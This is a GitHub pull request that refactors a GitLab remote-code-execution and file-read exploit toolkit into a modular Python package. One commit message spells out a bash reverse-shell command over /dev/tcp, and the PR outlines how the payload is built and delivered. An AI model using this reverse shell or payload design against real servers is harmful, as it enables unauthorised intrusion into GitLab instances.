Refactor: modularize gitlab_rce codebase into clean src/ structure following best practices#1
Open
LinuxUser255 wants to merge 8 commits into
Conversation
Break gitlab_rce-refactor.py into a proper Python package under src/
with a minimal main.py entry point.

Structure
---------
src/
  client.py  — GitlabClient replaces the GitlabRCE base class;
               all exploits receive it via composition
  parsers.py — extracted GitlabParse, ProjectIDParse, VersionParse
  version.py — detect_version() function replaces GitlabVersion subclass
  runner.py  — CLI menu and dispatch; absorbs GitlabRCE1281LFIUser
  exploits/
    rce_1147.py — RCE1147(client); no inheritance
    lfi_1281.py — LFI1281(client, path); read_file() returns contents
    rce_1281.py — RCE1281(client); uses LFI1281 via composition,
                  eliminating the RCE→LFI→base inheritance chain

Design decisions
----------------
- Composition over inheritance throughout; no multiple inheritance
- GitlabRCE1281LFIUser deleted (was a subclass just for one input() call)
- create_empty_project() returns the project name so exploit logic
  does not depend on client.projects list ordering across runs
- Marshal template and Redis template extracted as module-level constants
- PEP 8 pass on refactor file: f-strings, dict formatting, super(),
  import ordering, line lengths, slice spacing

Also added
----------
- .gitignore (Python standard + project-specific loot/output dirs)
- requirements.txt
- README.md cleanup: CVE table, NVD links, updated usage
…x shell command

- Removed _MARSHAL_TEMPLATE and _length_byte entirely
- Build payload as raw byte concatenation (no templates, no escaping,
  no manual length calculation)
- Use single-quoted shell command: /bin/sh -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'
  to prevent quoting issues with /bin/sh
- Rest of the code (run loop, _deliver, _parse_secret_key, class structure)
  remains unchanged
Owner
Thank you for your PR. 2 hours between fork and pull request is quite a feat to refactor the whole project while keeping the functionality untouched. I have a few questions
- Use compiled ERB bytecode instead of raw template syntax
- Calculate length byte dynamically (src_len + 5)
- Use bash -c explicitly for fd redirection support
- Add exploit-dev/ directory with annotated analysis scripts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
PR: Refactor monolithic script into clean, modular codebase with separation of concerns
Refactored the entire codebase by breaking the large `gitlab_rce-refactor.py` into a well-structured, maintainable Python package under `src/`, following best practices.

Key Changes

- `src/` layout and minimal `main.py` entry point
- `client.py`, `parsers.py`, `version.py`, `runner.py`
- `exploits/` subpackage (each exploit now uses composition)
- Removed `GitlabRCE1281LFIUser` and simplified the RCE → LFI inheritance chain
- Added `.gitignore`, `requirements.txt`, and cleaned up README.md

The original functionality remains unchanged — only structure, readability, and maintainability were improved.
The original README.md mentioned that this script “needs a HUGE refactor some time in the future.” Refactoring codebases is something I enjoy doing from time to time, so I went ahead and gave it a go.
Hope this helps! The code is now much cleaner and more maintainable. Still needs some work on popping shells, but the improved formatting and separation of concerns should make future enhancements and scalability much easier.
This refactor was guided by the Python Best Practices along with DRY, KISS, SOLID principles, and the Zen of Python.